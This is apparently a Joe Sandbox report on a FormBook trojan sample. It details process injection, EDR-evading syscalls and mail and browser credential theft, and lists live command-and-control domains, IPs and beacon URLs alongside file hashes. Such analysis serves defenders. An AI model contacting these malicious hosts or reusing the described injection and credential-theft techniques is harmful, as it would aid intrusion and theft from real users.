            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2715513437.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1960347440.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1960938102.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2718155143.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00858C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00858C4F
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0085923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0085923B

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		2
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569366 Sample: s7Okni1gfE.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 28 www.ngmr.xyz 2->28 30 www.zz82x.top 2->30 32 5 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 s7Okni1gfE.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 WNGaDiurNI.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 clip.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 WNGaDiurNI.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.ngmr.xyz 54.67.87.110, 49821, 49827, 49833 AMAZON-02US United States 22->34 36 www.ophthalmo.cloud 217.160.0.207, 49782, 49788, 49794 ONEANDONE-ASBrauerstrasse48DE Germany 22->36 38 2 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            s7Okni1gfE.exe74%ReversingLabsWin32.Trojan.AutoitInject
            s7Okni1gfE.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.ophthalmo.cloud/mgg3/?DTs4CD4=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY23gB1m4CBXHBSkrnrwKbx/qmY6AwmTWdie10g6VbJmKkWlw==&v4=NRh80%Avira URL Cloudsafe
            http://www.ngmr.xyz/qj8y/100%Avira URL Cloudmalware
            http://www.zz82x.top/fk06/100%Avira URL Cloudmalware
            http://www.ophthalmo.cloud/mgg3/0%Avira URL Cloudsafe
            http://www.ngmr.xyz/qj8y/?DTs4CD4=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg==&v4=NRh8100%Avira URL Cloudmalware
            http://www.healthyloveforall.net/r22w/?v4=NRh8&DTs4CD4=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q==0%Avira URL Cloudsafe
            http://www.zz82x.top/fk06/?v4=NRh8&DTs4CD4=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ==100%Avira URL Cloudmalware
            http://www.ngmr.xyz100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.ophthalmo.cloud
            		217.160.0.207
            		truefalse
              		unknown
              www.ngmr.xyz
              		54.67.87.110
              		truetrue
                		unknown
                zz82x.top
                		38.47.232.196
                		truefalse
                  		unknown
                  healthyloveforall.net
                  		3.33.130.190
                  		truefalse
                    		unknown
                    www.healthyloveforall.net
                    		unknown
                    		unknowntrue
                      		unknown
                      www.zz82x.top
                      		unknown
                      		unknowntrue
                        		unknown
                        www.bonusgame2024.online
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.ngmr.xyz/qj8y/?DTs4CD4=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg==&v4=NRh8false
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.ngmr.xyz/qj8y/false
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.zz82x.top/fk06/false
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.ophthalmo.cloud/mgg3/?DTs4CD4=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY23gB1m4CBXHBSkrnrwKbx/qmY6AwmTWdie10g6VbJmKkWlw==&v4=NRh8false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.ophthalmo.cloud/mgg3/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.healthyloveforall.net/r22w/?v4=NRh8&DTs4CD4=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q==false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.zz82x.top/fk06/?v4=NRh8&DTs4CD4=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ==false
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://ac.ecosia.org/autocomplete?q=clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/chrome_newtabclip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchclip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.ecosia.org/newtab/clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.ngmr.xyzWNGaDiurNI.exe, 00000008.00000002.2717205821.0000000001048000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          38.47.232.196
                                          		zz82x.topUnited States
                                          		174COGENT-174USfalse
                                          54.67.87.110
                                          		www.ngmr.xyzUnited States
                                          		16509AMAZON-02UStrue
                                          217.160.0.207
                                          		www.ophthalmo.cloudGermany
                                          		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                          3.33.130.190
                                          		healthyloveforall.netUnited States
                                          		8987AMAZONEXPANSIONGBfalse

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1569366
                                          Start date and time:2024-12-05 18:20:08 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 8s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:10
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:2
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:s7Okni1gfE.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:fb5a580f87999b4acfc3088dfcde8a710d620c005df30cfa0bca94bf3bcdbb89.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@7/3@5/4
                                          EGA Information:
                                          • Successful, ratio: 66.7%
                                          HCA Information:
                                          • Successful, ratio: 95%
                                          • Number of executed functions: 49
                                          • Number of non-executed functions: 296
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target WNGaDiurNI.exe, PID 5316 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • VT rate limit hit for: s7Okni1gfE.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          12:22:35API Interceptor611508x Sleep call for process: clip.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          38.47.232.196jeez.exeGet hashmaliciousFormBookBrowse
                                          • www.zz82x.top/fk06/
                                          3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                          • www.zz82x.top/jxne/
                                          RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
                                          • www.zz82x.top/jxne/
                                          w64HYOhfv1.exeGet hashmaliciousFormBookBrowse
                                          • www.zz82x.top/ak5l/
                                          enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                          • www.zz82x.top/ak5l/
                                          Enquiry.exeGet hashmaliciousFormBookBrowse
                                          • www.zz82x.top/ak5l/
                                          Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                          • www.zz82x.top/2lu6/
                                          x.exeGet hashmaliciousFormBookBrowse
                                          • www.zz82x.top/ym8o/
                                          bin.exeGet hashmaliciousFormBookBrowse
                                          • www.zz82x.top/ym8o/
                                          54.67.87.110rHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                          • www.ngmr.xyz/ntib/
                                          jeez.exeGet hashmaliciousFormBookBrowse
                                          • www.ngmr.xyz/qj8y/
                                          -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                          • www.ngmr.xyz/txr6/
                                          UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.ngmr.xyz/txr6/
                                          AUG 2024 SOA.exeGet hashmaliciousFormBookBrowse
                                          • www.teenageoverload.xyz/tk11/
                                          DN.exeGet hashmaliciousFormBookBrowse
                                          • www.teenageoverload.xyz/tk11/
                                          Debit note Jan-Jul 2024.exeGet hashmaliciousFormBookBrowse
                                          • www.teenageoverload.xyz/tk11/
                                          ZRaWv2lX6l.exeGet hashmaliciousFormBookBrowse
                                          • www.3937981.xyz/enuj/

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          www.ophthalmo.cloudjeez.exeGet hashmaliciousFormBookBrowse
                                          • 217.160.0.207
                                          sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                          • 217.160.0.207
                                          www.ngmr.xyzPurchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                          • 54.67.87.110
                                          rHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                          • 54.67.87.110
                                          jeez.exeGet hashmaliciousFormBookBrowse
                                          • 54.67.87.110
                                          -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                          • 54.67.87.110
                                          z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                          • 54.67.87.110
                                          UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 54.67.87.110

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          AMAZON-02USfmlgbgc2p5.exeGet hashmaliciousNeconydBrowse
                                          • 52.34.198.229
                                          spc.elfGet hashmaliciousUnknownBrowse
                                          • 54.171.230.55
                                          cOviNFmw21.exeGet hashmaliciousNeconydBrowse
                                          • 52.34.198.229
                                          https://ln5.sync.com/dl/3c61e3b30#gum48d7j-5vgyh9gy-tcjv9rp4-ffxvqp5fGet hashmaliciousUnknownBrowse
                                          • 15.222.106.233
                                          https://tippfloorcovering-my.sharepoint.com/:f:/g/personal/inderjeet_tippfloor_com/EpEIzIGDzrlMs2z8rWgki5MBO5-d64iEaOqqeF3ulFqTiw?e=T39wglGet hashmaliciousUnknownBrowse
                                          • 108.158.75.11
                                          http://kitces.emlnk1.comGet hashmaliciousUnknownBrowse
                                          • 13.227.9.168
                                          https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/Get hashmaliciousUnknownBrowse
                                          • 13.250.84.149
                                          https://sendgb.com/Aw8gObHpGVR?utm_medium=dZJEAfc2MGnvjBDGet hashmaliciousHTMLPhisherBrowse
                                          • 63.32.181.175
                                          mpsl.elfGet hashmaliciousUnknownBrowse
                                          • 54.171.230.55
                                          https://sendgb.com/dxukcl49bIj?utm_medium=mvC3BJ1YMhqe8znGet hashmaliciousHTMLPhisherBrowse
                                          • 52.48.36.35
                                          COGENT-174USf5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                          • 38.224.37.24
                                          https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/Get hashmaliciousUnknownBrowse
                                          • 38.91.45.7
                                          VIP-#U4f1a#U5458#U7248.exeGet hashmaliciousBlackMoonBrowse
                                          • 114.114.114.114
                                          New quotation request.exeGet hashmaliciousFormBookBrowse
                                          • 38.47.232.202
                                          SRT68.exeGet hashmaliciousFormBookBrowse
                                          • 154.23.184.207
                                          mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 149.51.18.106
                                          reduce.exeGet hashmaliciousGO BackdoorBrowse
                                          • 38.180.205.164
                                          powerpc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 149.6.31.140
                                          armv4l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 38.0.95.125
                                          mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 38.168.56.189
                                          ONEANDONE-ASBrauerstrasse48DEsparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                          • 74.208.53.196
                                          FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                                          • 217.160.114.212
                                          FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                                          • 217.160.114.212
                                          togiveme.docGet hashmaliciousRemcosBrowse
                                          • 217.160.114.212
                                          nicetomeetyougreatthignsgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                          • 217.160.114.212
                                          cUxXrdUvYR.rtfGet hashmaliciousRemcosBrowse
                                          • 217.160.114.212
                                          Amoxycillin Trihydrate Powder.docx.docGet hashmaliciousRemcosBrowse
                                          • 217.160.114.212
                                          teste.ppc.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                          • 82.223.130.227
                                          UVIxNxvzCl.rtfGet hashmaliciousUnknownBrowse
                                          • 217.160.114.212
                                          6PAuIAUnwm.docGet hashmaliciousUnknownBrowse
                                          • 217.160.114.212

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\5-19-2H

                                          Download File
                                          Process:C:\Windows\SysWOW64\clip.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                          Category:dropped
                                          Size (bytes):196608
                                          Entropy (8bit):1.1209886597424439
                                          Encrypted:false
                                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                          MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                          SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                          SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                          SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Lymnaeidae

                                          Download File
                                          Process:C:\Users\user\Desktop\s7Okni1gfE.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):287232
                                          Entropy (8bit):7.99254067202499
                                          Encrypted:true
                                          SSDEEP:6144:WTJrXNltbv65AK99qKCulsT6ii0ZgG1/Fq8MtYr+lzw:ktvM9k00VSG1/sb+czw
                                          MD5:61AB21AD38915EA1ED756131C057630A
                                          SHA1:BD0079D60AD4C8C58CC1514EEA731D1B09FBDAFE
                                          SHA-256:7A3EF87E4B100FE084642807428002A932387745D7BC4C800779F471E97DDA2F
                                          SHA-512:8B42F86531959EAD6C317EBFE18F562BFF5BA43E8433CCB7B78522D7BFD7724645193BA16A7FE6232302E80085BE97ED66F40FBEFB0A5B3E35D60E3A15B0B623
                                          Malicious:false
                                          Reputation:low
                                          Preview:.ns..DPE0...[...u.DS...k0Z...6IXDPE0DC3RDR46IXDPE0DC3RDR46I.DPE>[.=R.[...Y..dd,*@r4 [Q;9)p&Q*-\&d0Q.;-*p,^d.|.d?[R,vI]O.DC3RDR4OHQ.m%W.~S5.oTQ.B....$$.H....)?.J..S5..]U!e$7.0DC3RDR4f.XD.D1D..C.R46IXDPE.DA2YEY46.\DPE0DC3RD. 6IXTPE0$G3RD.46YXDPG0DE3RDR46I^DPE0DC3R$V46KXDPE0DA3..R4&IXTPE0DS3RTR46IXD@E0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3|07LBIXD..4DC#RDRd2IXTPE0DC3RDR46IXDpE0$C3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXD

                                          C:\Users\user\AppData\Local\Temp\aut4C01.tmp

                                          Download File
                                          Process:C:\Users\user\Desktop\s7Okni1gfE.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):287232
                                          Entropy (8bit):7.99254067202499
                                          Encrypted:true
                                          SSDEEP:6144:WTJrXNltbv65AK99qKCulsT6ii0ZgG1/Fq8MtYr+lzw:ktvM9k00VSG1/sb+czw
                                          MD5:61AB21AD38915EA1ED756131C057630A
                                          SHA1:BD0079D60AD4C8C58CC1514EEA731D1B09FBDAFE
                                          SHA-256:7A3EF87E4B100FE084642807428002A932387745D7BC4C800779F471E97DDA2F
                                          SHA-512:8B42F86531959EAD6C317EBFE18F562BFF5BA43E8433CCB7B78522D7BFD7724645193BA16A7FE6232302E80085BE97ED66F40FBEFB0A5B3E35D60E3A15B0B623
                                          Malicious:false
                                          Reputation:low
                                          Preview:.ns..DPE0...[...u.DS...k0Z...6IXDPE0DC3RDR46IXDPE0DC3RDR46I.DPE>[.=R.[...Y..dd,*@r4 [Q;9)p&Q*-\&d0Q.;-*p,^d.|.d?[R,vI]O.DC3RDR4OHQ.m%W.~S5.oTQ.B....$$.H....)?.J..S5..]U!e$7.0DC3RDR4f.XD.D1D..C.R46IXDPE.DA2YEY46.\DPE0DC3RD. 6IXTPE0$G3RD.46YXDPG0DE3RDR46I^DPE0DC3R$V46KXDPE0DA3..R4&IXTPE0DS3RTR46IXD@E0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3|07LBIXD..4DC#RDRd2IXTPE0DC3RDR46IXDpE0$C3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXDPE0DC3RDR46IXD

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.160445263760609
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:s7Okni1gfE.exe
                                          File size:1'226'752 bytes
                                          MD5:19730719a742ee889c6bd0b9e635d234
                                          SHA1:bdf8492135d88c88050319d017cbb49779f81f59
                                          SHA256:fb5a580f87999b4acfc3088dfcde8a710d620c005df30cfa0bca94bf3bcdbb89
                                          SHA512:d7d6e925602fd986ec03d9a88e8baab3b636cad77d11649ae24a780b73a6640e75da7f7a650ffb56297ad4c208fd988e2717ae8620436a75e48e28dcd3be0afe
                                          SSDEEP:24576:Ftb20pkaCqT5TBWgNQ7a+TTqyCfUPH/NZ/6A:2Vg5tQ7a+T2yCU/VR5
                                          TLSH:0445DF2373DD8364C3B25273BA26B741AEBF782506B5F56B2FD4093DB820162521E673
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                          File Icon

                                          Icon Hash:aaf3e3e3938382a0

                                          Static PE Info

                                          General

                                          Entrypoint:0x425f74
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
